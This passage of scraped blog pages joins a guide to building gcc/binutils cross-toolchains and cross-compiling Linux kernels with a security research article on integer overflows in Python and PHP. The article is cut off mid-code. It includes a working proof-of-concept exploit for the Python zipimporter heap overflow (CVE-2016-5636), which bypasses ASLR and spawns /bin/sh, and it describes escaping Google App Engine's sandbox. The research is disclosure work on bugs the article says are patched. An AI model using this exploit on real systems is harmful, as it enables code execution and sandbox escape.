whatever reasons you might have, such as using the latest version or
a customized version of <code>gcc</code>, you might follow the following steps.</p>
<p>As a head up, I am running a standard Ubuntu 16.04.3 LTS release with
kernel version 4.4.0. The host <code>gcc</code> and <code>binutils</code> (i.e., the <code>gcc</code>
and <code>binutils</code> used to build the toolchain) are the default ones with the
Ubuntu release, which is in version 5.4.0 and 2.27 respectively.
However, I don't see major obstacles in applying it to other combinations
of OS, <code>gcc</code>, and <code>binutils</code> versions as long as they are recent enough
to build the toolchain.</p>
<p>Before diving into the building process, let's setup some environment
variables. Part of them are for convenience reasons, while others are
necessary in the build process.</p>
<div class="highlight"><pre><span></span><code><span class="nb">export</span><span class="w"> </span><span class="nv">TARGET</span><span class="o">=</span>aarch64-unknown-linux-gnu<span class="w"> </span><span class="c1"># replace with your intended target</span>
<span class="nb">export</span><span class="w"> </span><span class="nv">PREFIX</span><span class="o">=</span><span class="s2">"</span><span class="nv">$HOME</span><span class="s2">/opt/cross/aarch64"</span><span class="w"> </span><span class="c1"># replace with your intended path</span>
<span class="nb">export</span><span class="w"> </span><span class="nv">PATH</span><span class="o">=</span><span class="s2">"</span><span class="nv">$PREFIX</span><span class="s2">/bin:</span><span class="nv">$PATH</span><span class="s2">"</span>
</code></pre></div>
<p>The <code>TARGET</code> variable should be a <em>target triplet</em> which is used by the
<code>autoconf</code> system. Their valid values can be found in the
<a href="http://git.savannah.gnu.org/gitweb/?p=config.git;a=blob_plain;f=config.guess;hb=HEAD">config.guess script</a>.</p>
<p>The last step is necessary. By adding the installation prefix to the the
<code>PATH</code> of the current shell session, we ensure the <code>gcc</code> is able to detect
our new <code>binutils</code> once we have built them.</p>
<h3>binutils</h3>
<p>The source code for <code>binutils</code> can be obtained from the GNU servers:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># for stable releases</span>
<span class="nv">BINUTILS_VERSION</span><span class="o">=</span><span class="m">2</span>.29.1
wget<span class="w"> </span>ftp://ftp.gnu.org/gnu/binutils/binutils-<span class="nv">$BINUTILS_VERSION</span>.tar.xz
<span class="c1"># for development branch</span>
git<span class="w"> </span>clone<span class="w"> </span>git://sourceware.org/git/binutils-gdb.git
</code></pre></div>
<p>After that, modify the source code as you wish and build it with the
following steps.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span><span class="w"> </span><span class="nv">$BINUTILS_BUILD</span>
<span class="nv">$BINUTILS_SOURCE</span>/configure<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--target<span class="o">=</span><span class="nv">$TARGET</span><span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--prefix<span class="o">=</span><span class="nv">$PREFIX</span><span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--with-sysroot<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-nls<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-werror
make
make<span class="w"> </span>install
</code></pre></div>
<p>Since we have multiple targets to build, it is better to have a separate
build directory for each target.</p>
<p><strong>--disable-nls</strong> tells <code>binutils</code> not to include native language
support. This is optional, but reduces dependencies and compile time.</p>
<p><strong>--with-sysroot</strong> tells <code>binutils</code> to enable sysroot support in
the cross-compiler by pointing it to a default empty directory.
By default the linker refuses to use sysroots for no good technical reason,
while <code>gcc</code> is able to handle both cases at runtime. </p>
<p><strong>--disable-werror</strong> behaves exactly as the name suggests, do not add
<code>-Werror</code> in the flag.</p>
<p>After installation, the binaries <code>aarch64-unknown-linux-gnu-{as/ar/ld/...}</code>
should exist in <code>$PATH</code>.</p>
<p>These instructions apply to <code>binutils</code> version 2.29.1, which is the latest
release at the time of writing. </p>
<h3>gcc</h3>
<p>Similar to <code>binutils</code>. the source code for <code>gcc</code> can be obtained from the
GNU servers too:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># for stable releases</span>
<span class="nv">GCC_VERSION</span><span class="o">=</span><span class="m">7</span>.2.0
wget<span class="w"> </span>ftp://ftp.gnu.org/gnu/gcc/gcc-<span class="nv">$GCC_VERSION</span>/gcc-<span class="nv">$GCC_VERSION</span>.tar.xz
<span class="c1"># for development branch</span>
git<span class="w"> </span>clone<span class="w"> </span>git://gcc.gnu.org/git/gcc.git
</code></pre></div>
<p>After that, modify the source code as you wish and build it with the
following steps.</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span><span class="w"> </span><span class="nv">$GCC_SOURCE</span>
./contrib/download_prerequisites
<span class="nb">cd</span><span class="w"> </span><span class="nv">$GCC_BUILD</span>
<span class="nv">$GCC_SOURCE</span>/configure<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--target<span class="o">=</span><span class="nv">$TARGET</span><span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--prefix<span class="o">=</span><span class="nv">$PREFIX</span><span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--enable-languages<span class="o">=</span>c,c++<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--without-headers<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-nls<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-shared<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-decimal-float<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-threads<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libmudflap<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libssp<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libgomp<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libquadmath<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libatomic<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libmpx<span class="w"> </span><span class="se">\</span>
<span class="w"> </span>--disable-libcc1
make<span class="w"> </span>all-gcc
make<span class="w"> </span>install-gcc<span class="w"> </span>
</code></pre></div>
<p>Downloading the pre-requisites (<em>gmp</em>, <em>mpfr</em>, <em>mpc</em>, <em>isl</em>) areis
necessary as <code>gcc</code> needs these packages for compilation. This is handled
seamlessly with the <code>download_prerequisites</code> script. </p>
<p><strong>--enable-languages=c,c++</strong> tells <code>gcc</code> not to build frontends
for other languages like Fortran, Java, etc.</p>
<p><strong>--without-headers</strong> tells <code>gcc</code> not to rely on any C library
being present for the target.</p>
<p><strong>--disable-<package></strong> tells <code>gcc</code> not to build those packages
as they will not be needed in kernel compilation.</p>
<p>More importantly, we should not simply <code>make all</code> as that would
build way too much (for example, the <em>libgcc</em>, <em>libc</em>, <em>libstdc++</em>,
etc), which are not needed at all. All we need is the compiler
itself which can be built by <code>make all-gcc</code>.</p>
<p>Another important note is that in order for <code>gcc</code> to lookup the
correct set of <code>binutils</code>, both <code>$TARGET</code> and <code>$PREFIX</code> must be
exactly the same when configuring <code>binutils</code> and <code>gcc</code>.
For example, <code>aarch64-unknown-linux-gnu-gcc</code> will lookup
<code>aarch64-unknown-linux-gnu-as</code> <strong><em>in the same directory</em></strong>:
merely putting <code>aarch64-unknown-linux-gnu-as</code> in <code>$PATH</code>is not enough.</p>
<p>The instructions apply to <code>gcc</code> version 7.2.0, which is the latest
release at the time of writing.</p>
<p>After the whole process, the following files should present in the
<code>$PREFIX/bin</code> directory, and also in the <code>$PATH</code>.</p>
<div class="highlight"><pre><span></span><code>aarch64-unknown-linux-gnu-addr2line
aarch64-unknown-linux-gnu-ar
aarch64-unknown-linux-gnu-as
aarch64-unknown-linux-gnu-c++
aarch64-unknown-linux-gnu-c++filt
aarch64-unknown-linux-gnu-cpp
aarch64-unknown-linux-gnu-elfedit
aarch64-unknown-linux-gnu-g++
aarch64-unknown-linux-gnu-gcc
aarch64-unknown-linux-gnu-gcc-7.2.0
aarch64-unknown-linux-gnu-gcc-ar
aarch64-unknown-linux-gnu-gcc-nm
aarch64-unknown-linux-gnu-gcc-ranlib
aarch64-unknown-linux-gnu-gcov
aarch64-unknown-linux-gnu-gcov-dump
aarch64-unknown-linux-gnu-gcov-tool
aarch64-unknown-linux-gnu-gprof
aarch64-unknown-linux-gnu-ld
aarch64-unknown-linux-gnu-ld.bfd
aarch64-unknown-linux-gnu-nm
aarch64-unknown-linux-gnu-objcopy
aarch64-unknown-linux-gnu-objdump
aarch64-unknown-linux-gnu-ranlib
aarch64-unknown-linux-gnu-readelf
aarch64-unknown-linux-gnu-size
aarch64-unknown-linux-gnu-strings
aarch64-unknown-linux-gnu-strip
</code></pre></div>
<h2>Kernel Build</h2>
<p>With the toolchain ready, cross-compiling the kernel involves
two extra steps: </p>
<ol>
<li>Find the architecture name (<code>$KERNEL_ARCH</code>) in kernel source tree <ul>
<li>they are typically Located in <code>arch/*</code> in the kernel source tree.</li>
</ul>
</li>
<li>Find the configuration (<code>$KERNEL_CONF</code>) for each sub-arch
(e.g., 32-bit vs 64-bit, big endian vs little endian, etc)<ul>
<li><code>make ARCH=$KERNEL_ARCH help</code> will show some hints.</li>
<li>if there is no specific machine config, the <code>defconfig</code> should work.</li>
<li>if there are available machine configs, choosing from an existing
config seems to be more hassle free compared with doing a manual
<code>menuconfig</code>.</li>
</ul>
</li>
</ol>
<p>Once we find the values for <code>$KERNEL_ARCH</code> and <code>$KERNEL_CONF</code>,
cross-compiling the kernel is as easy as the following:</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span><span class="w"> </span><span class="nv">$KERNEL_SOURCE</span>
make<span class="w"> </span><span class="nv">ARCH</span><span class="o">=</span><span class="nv">$KERNEL_ARCH</span><span class="w"> </span><span class="nv">O</span><span class="o">=</span><span class="nv">$KERNEL_BUILD</span><span class="w"> </span><span class="nv">$KERNEL_CONF</span>
<span class="nb">cd</span><span class="w"> </span><span class="nv">$KERNEL_BUILD</span>
make<span class="w"> </span><span class="nv">ARCH</span><span class="o">=</span><span class="nv">$KERNEL_ARCH</span><span class="w"> </span><span class="nv">CROSS_COMPILE</span><span class="o">=</span><span class="nv">$TARGET</span>-<span class="w"> </span><span class="nv">V</span><span class="o">=</span><span class="m">1</span><span class="w"> </span>vmlinux<span class="w"> </span>modules
</code></pre></div>
<p>For example, in the case of building the <em>aarch64</em> kernel,
the command should look like the following:</p>
<div class="highlight"><pre><span></span><code><span class="nb">cd</span><span class="w"> </span><span class="nv">$KERNEL_SOURCE</span>
make<span class="w"> </span><span class="nv">ARCH</span><span class="o">=</span>arm64<span class="w"> </span><span class="nv">O</span><span class="o">=</span><span class="nv">$KERNEL_BUILD</span><span class="w"> </span>defconfig
<span class="nb">cd</span><span class="w"> </span><span class="nv">$KERNEL_BUILD</span>
make<span class="w"> </span><span class="nv">ARCH</span><span class="o">=</span>arm64<span class="w"> </span><span class="nv">CROSS_COMPILE</span><span class="o">=</span>aarch64-unknown-linux-gnu-<span class="w"> </span><span class="nv">V</span><span class="o">=</span><span class="m">1</span><span class="w"> </span>vmlinux<span class="w"> </span>modules
</code></pre></div>
<p>Of course we can always speed up the build process with the <code>make -j</code> flags.</p>
<p>The instructions apply to Linux kernel version 4.13.5, which is the latest
release at the time of writing.</p>
<h2>Results</h2>
<p>In total, I have currently cross-compiled the kernel for 7 architectures
and 12 sub-archs, with the procedure described above. The result is
summarized in the following table:</p>
<center>
| Architecture | Name | `$TARGET` | `$KERNEL_ARCH` | `$KERNEL_CONF` |
| :--------------- | :------ | :---------------------------- | :------------- | :---------------- |
| x86 (32-bit) | i386 | i386-pc-linux-gnu | x86 | i386_defconfig |
| x86 (64-bit) | x86_64 | x86_64-pc-linux-gnu | x86 | x86_64_defconfig |
| arm (32-bit) | arm | armv7-unknown-linux-gnueabi | arm | multi_v7_defconfig |
| arm (64-bit) | aarch64 | aarch64-unknown-linux-gnu | arm64 | defconfig |
| powerpc (32-bit) | ppc | powerpcle-unknown-linux-gnu | powerpc | pmac32_defconfig |
| powerpc (64-bit) | ppc64 | powerpc64le-unknown-linux-gnu | powerpc | ppc64le_defconfig |
| sparc (32-bit) | sparc | sparc-unknown-linux-gnu | sparc | sparc32_defconfig |
| sparc (64-bit) | sparc64 | sparc64-unknown-linux-gnu | sparc | sparc64_defconfig |
| mips (32-bit) | mips | mips-unknown-linux-gnu | mips | 32r6_defconfig |
| mips (64-bit) | mips64 | mips64-unknown-linux-gnu | mips | 64r6_defconfig |
| s390x (64-bit) | s390x | s390x-ibm-linux-gnu | s390 | default_defconfig |
| ia64 (64-bit) | ia64 | ia64-unknown-linux-gnu | ia64 | generic_defconfig |
</center>
<p>I have also tried building an <code>allyesconfig</code> kernel and succeeded in 7
architectures, as shown in the following table.
Unfortunately, <em>ia64</em> failed miserably with error message
<code>Error: Operand 2 of 'adds' should be a 14-bit integer (-8192-8191)</code>,
and the error seems to have been there for
<a href="https://lkml.org/lkml/2016/8/14/57">more than 7 months</a>.</p>
<center>
| Architecture | Name | `$TARGET` | `$KERNEL_ARCH` | `$KERNEL_CONF` |
| :--------------- | :------ | :---------------------------- | :------------- | :----------------- |
| x86 (64-bit) | x86_64 | x86_64-pc-linux-gnu | x86 | allyesconfig |
| arm (32-bit) | arm | armv7-unknown-linux-gnueabi | arm | allyesconfig |
| arm (64-bit) | aarch64 | aarch64-unknown-linux-gnu | arm64 | allyesconfig |
| powerpc (64-bit) | ppc64 | powerpc64-unknown-linux-gnu | powerpc | allyesconfig |
| sparc (64-bit) | sparc64 | sparc64-unknown-linux-gnu | sparc | allyesconfig |
| mips (64-bit) | mips64 | mips64-unknown-linux-gnu | mips | allyesconfig |
| s390x (64-bit) | s390x | s390x-ibm-linux-gnu | s390 | allyesconfig |
</center>
<p>In case you want to try out, you can directly feed the corresponding
values for <code>$TARGET</code>, <code>$KERNEL_ARCH</code>, and <code>$KERNEL_CONF</code> into the scripts
above and test.</p>
<h3>Future works</h3>
<p>I did not try with the less common (or inactive) architectures
such as <em>blackfin</em>, <em>sh</em>, or <em>tile</em> although I believe that they
can be cross-compiled in the similar way as well.</p>
<p>Certain architectures are not available in the official <code>gcc</code>
source tree and one example is the <code>gcc</code> for <em>openrisc</em>. In these
cases, we have to compile the toolchain from the correspondingly
ported versions such as <a href="https://github.com/openrisc/or1k-gcc">GCC port for OpenRISC 1000</a>.</p>Integer Overflow Vulnerabilities in Language Interpreters2016-10-11T00:00:00+02:002016-10-11T00:00:00+02:00Yeongjin Jangtag:gts3.org,2016-10-11:/2016/lang-bug.html<p>Exploiting four integer overflow vulnerabilities in Python and PHP</p><h1>Introduction</h1>
<p>Security vulnerabilities in language interpreters are considered more critical
than bugs in software in general because they could break the trust for
trusted computing base (TCB) as Ken Thompson pointed on his famous turing award
lecture in 1984 [1]. For instance, these vulnerabilities break the security
guarantee provided by security analysis tools or code auditing while the
most of such analyses grounded on the trust for language interpreters.
Instead of starting the security analysis from low-level parts of
a machine, the analysis sets the interpreter as a root of trust,
then performs static and dynamic analyses over the language abstraction
to test software against bugs. Although such analyses can catch
bugs in the code level, they cannot detect vulnerabilities underlying
the interpreter. These hideous vulnerabilities, if any of these is exploited,
break the trust guaranteed by the analyses performed over the code.</p>
<p>Another example remarkably affected by such bugs is the language interpreter
sandbox in cloud providers. Cloud providers such as
<a href="https://cloud.google.com/appengine/docs/python/runtime">Google App Engine</a> modified the language
interpreter to create sandbox by only providing restricted environment (e.g.,
that cannot execute shell command or cannot interact with OS-related functions)
to the guest of the cloud. The main purpose of having such sandboxes is to
isolate the guest and limit the resource while not running the code in the
virtual machines, which is costly in performance. Nonetheless, since the
restrictions of the sandbox is based on trusted language interpreters, the
isolation cannot be guaranteed if a vulnerability in the interpreter is
exploited by an attacker.</p>
<p>In this article, we demostrate four integer overflow vulnerabilities, which
are found by our recent research work [2], in Python and PHP language
interpreters that can be exploited for control-flow hijacking. These
vulnerabilities undermine the trust of language interpreters, thus break
security guarantees on language runtime sandbox. We note that all these
vulnerabilities disclosed here have been patched already in the upstream
release version of Python and PHP.</p>
<h1>Python zipimporter heap overflow(CVE-2016-5636)</h1>
<h2>zipimport</h2>
<div class="highlight"><pre><span></span><code>$<span class="w"> </span>python
>>><span class="w"> </span>import<span class="w"> </span>sys
>>><span class="w"> </span>sys.path
<span class="o">[</span>...,<span class="w"> </span><span class="s1">'/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg'</span>,<span class="w"> </span>...<span class="o">]</span>
$<span class="w"> </span>file<span class="w"> </span>/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg
/usr/local/lib/python2.7/dist-packages/aenum-1.4.5-py2.7.egg:<span class="w"> </span>Zip<span class="w"> </span>archive<span class="w"> </span>data,<span class="w"> </span>at<span class="w"> </span>least<span class="w"> </span>v2.0<span class="w"> </span>to<span class="w"> </span>extract
</code></pre></div>
<p><code>sys.path</code>, search paths for modules, contains not only directories, but also
ZIP files. <code>zipimport</code> module provides the way to import Python modules from
ZIP-format archives.</p>
<h2>Vulnerability</h2>
<div class="highlight"><pre><span></span><code><span class="c1">// zipimporter.c</span>
<span class="n">bytes_size</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">compress</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="n">data_size</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="n">data_size</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bytes_size</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span>
<span class="w"> </span><span class="n">bytes_size</span><span class="o">++</span><span class="p">;</span>
<span class="n">raw_data</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">PyBytes_FromStringAndSize</span><span class="p">((</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">bytes_size</span><span class="p">);</span>
</code></pre></div>
<p>The vulnerability exists in ZIP file decoder of <code>zipimporter</code> module.
<code>data_size</code>, extracted from ZIP file, is not properly validated. If <code>data_size</code>
is 0xffffffff(-1) and <code>compress</code> is non-zero, then <code>bytes_size</code>, buffer size
for storing file data, becomes <strong><em>one</em></strong>. Later, Python reads a file to this
small buffer and heap overflow is occurred.</p>
<h2>Bypass ASLR</h2>
<div class="highlight"><pre><span></span><code>>>><span class="w"> </span>hex<span class="o">(</span>id<span class="o">(</span><span class="s1">'a'</span><span class="o">))</span>
<span class="s1">'0x7f6c2c677710'</span>
</code></pre></div>
<p>To achieve arbitrary code execution, we need to bypass ASLR. Fortunately,
Python uses a memory address as an <code>id</code> of an objet. By using built-in <code>id</code>, we
can bypass ASLR.</p>
<h2>Proof of Concept</h2>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env python2</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">os</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">zipimport</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">zipfile</span>
<span class="kn">import</span><span class="w"> </span><span class="nn">struct</span>
<span class="n">FILE</span> <span class="o">=</span> <span class="s1">'payload'</span>
<span class="n">ZIP</span> <span class="o">=</span> <span class="s1">'import.zip'</span>
<span class="n">DIR</span> <span class="o">=</span> <span class="s1">'sh'</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">exists</span><span class="p">(</span><span class="n">DIR</span><span class="p">):</span>
<span class="n">os</span><span class="o">.</span><span class="n">mkdir</span><span class="p">(</span><span class="n">DIR</span><span class="p">)</span>
<span class="n">addr</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="s2">"A"</span><span class="p">)</span>
<span class="n">libc_base</span> <span class="o">=</span> <span class="n">addr</span>
<span class="n">system_addr</span> <span class="o">=</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x46640</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"LIBC_BASE : </span><span class="si">%x</span><span class="s2">"</span> <span class="o">%</span> <span class="n">libc_base</span><span class="p">)</span>
<span class="n">bin_sh</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">DIR</span><span class="p">,</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'<Q'</span><span class="p">,</span> <span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x7b1998</span><span class="p">)</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">"</span><span class="se">\x00</span><span class="s2">"</span><span class="p">,</span> <span class="s2">""</span><span class="p">))</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">,</span> <span class="s1">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s2">"/bin/sh"</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">chmod</span><span class="p">(</span><span class="n">bin_sh</span><span class="p">,</span> <span class="mi">0777</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">putenv</span><span class="p">(</span><span class="s2">"PATH"</span><span class="p">,</span> <span class="n">os</span><span class="o">.</span><span class="n">getenv</span><span class="p">(</span><span class="s2">"PATH"</span><span class="p">)</span> <span class="o">+</span> <span class="s2">":"</span> <span class="o">+</span> <span class="n">DIR</span><span class="p">)</span>
<span class="n">some_string_obj</span> <span class="o">=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="s2">"QQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZaaaabbbbccccddddeeeeffff"</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="s2">"gggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvv"</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="s2">"wwwwxxxxyyyyzzzz"</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="s2">"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPP"</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="s2">"QQQQRRRRSSSSTTTTUUUU"</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"</span><span class="si">%x</span><span class="s2">"</span> <span class="o">%</span> <span class="nb">id</span><span class="p">(</span><span class="n">some_string_obj</span><span class="p">))</span>
<span class="c1"># func addr here</span>
<span class="n">some_string_obj</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'<Q'</span><span class="p">,</span> <span class="n">system_addr</span><span class="p">)</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">some_string_obj</span>
<span class="n">addr</span> <span class="o">=</span> <span class="nb">id</span><span class="p">(</span><span class="n">a</span><span class="p">)</span>
<span class="n">addrs</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">xrange</span><span class="p">(</span><span class="mi">8</span><span class="p">):</span>
<span class="n">addrs</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">addr</span> <span class="o">%</span> <span class="mh">0x100</span><span class="p">)</span>
<span class="n">addr</span> <span class="o">/=</span> <span class="mh">0x100</span>
<span class="n">addrs_2</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="k">lambda</span> <span class="n">x</span><span class="p">:</span><span class="nb">chr</span><span class="p">(</span><span class="n">x</span><span class="p">),</span> <span class="n">addrs</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="n">addrs_2</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"</span><span class="si">%x</span><span class="s2">"</span> <span class="o">%</span> <span class="nb">id</span><span class="p">(</span><span class="n">some_string_obj</span><span class="p">))</span>
<span class="c1"># generate input</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">FILE</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">payload</span> <span class="o">=</span> <span class="p">(</span><span class="s2">"aaaa"</span><span class="o">+</span><span class="p">(</span><span class="s2">""</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">addrs_2</span><span class="p">))</span> <span class="o">*</span> <span class="mi">128</span><span class="p">)</span>
<span class="n">f</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
<span class="n">zf</span> <span class="o">=</span> <span class="n">zipfile</span><span class="o">.</span><span class="n">PyZipFile</span><span class="p">(</span><span class="n">ZIP</span><span class="p">,</span> <span class="n">mode</span><span class="o">=</span><span class="s1">'w'</span><span class="p">)</span>
<span class="n">zf</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">FILE</span><span class="p">)</span>
<span class="n">zf</span><span class="o">.</span><span class="n">close</span><span class="p">()</span>
<span class="n">importer</span> <span class="o">=</span> <span class="n">zipimport</span><span class="o">.</span><span class="n">zipimporter</span><span class="p">(</span><span class="n">ZIP</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="nb">list</span><span class="p">(</span><span class="n">importer</span><span class="o">.</span><span class="n">_files</span><span class="p">[</span><span class="n">FILE</span><span class="p">])</span>
<span class="n">f</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="mi">1</span> <span class="c1"># compress</span>
<span class="n">f</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="c1"># file size</span>
<span class="n">importer</span><span class="o">.</span><span class="n">_files</span><span class="p">[</span><span class="n">FILE</span><span class="p">]</span> <span class="o">=</span> <span class="nb">tuple</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="n">importer</span><span class="o">.</span><span class="n">get_data</span><span class="p">(</span><span class="n">FILE</span><span class="p">)</span>
</code></pre></div>
<h2>Google App Engine</h2>
<p>Since <code>zipimport</code> is an essential module for Python, it is in the whitelist of
<a href="https://github.com/GoogleCloudPlatform/python-compat-runtime/blob/master/appengine-compat/exported_appengine_sdk/google/appengine/tools/devappserver2/python/sandbox.py#L925">Google App Engine's Python sandbox</a>. Consequently, the
attacker can exploit this vulnerability to break the sandbox. We reported this
issue to Google upon its discovery.</p>
<h1>Integer Overflow in PHP</h1>
<p>In PHP v7.0.2, strings are generally allocated by <code>zend_string_alloc()</code> function.</p>
<div class="highlight"><pre><span></span><code><span class="c1">// zend/zend_string.h</span>
<span class="k">static</span><span class="w"> </span><span class="n">zend_always_inline</span><span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">zend_string_alloc</span><span class="p">(</span><span class="kt">size_t</span><span class="w"> </span><span class="n">len</span><span class="p">,</span><span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">persistent</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">ret</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="p">)</span><span class="n">pemalloc</span><span class="p">(</span><span class="n">ZEND_MM_ALIGNED_SIZE</span><span class="p">(</span><span class="n">_ZSTR_STRUCT_SIZE</span><span class="p">(</span><span class="n">len</span><span class="p">)),</span><span class="w"> </span><span class="n">persistent</span><span class="p">);</span>
<span class="w"> </span><span class="n">GC_REFCOUNT</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span>
<span class="w"> </span><span class="c1">//..</span>
<span class="w"> </span><span class="n">ZSTR_LEN</span><span class="p">(</span><span class="n">ret</span><span class="p">)</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">len</span><span class="p">;</span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div>
<p>The function is a wrapper of <code>pemalloc</code>. The function internally invokes
<code>pemalloc(size)</code> to allocate the memory, with size value with respect to
len variable. The function itself seems to not to have any bug, however,
using the function with arithmetic expression as the length argument can create
a vulnerability.</p>
<h2>Vulnerability example in php_implode</h2>
<div class="highlight"><pre><span></span><code><span class="c1">// ext/standard/string.c</span>
<span class="n">PHPAPI</span><span class="w"> </span><span class="kt">void</span><span class="w"> </span><span class="n">php_implode</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="n">zend_string</span><span class="w"> </span><span class="o">*</span><span class="n">delim</span><span class="p">,</span><span class="w"> </span><span class="n">zval</span><span class="w"> </span><span class="o">*</span><span class="n">arr</span><span class="p">,</span><span class="w"> </span><span class="n">zval</span><span class="w"> </span><span class="o">*</span><span class="n">return_value</span><span class="p">)</span>
<span class="p">{</span>
<span class="w"> </span><span class="c1">// ...</span>
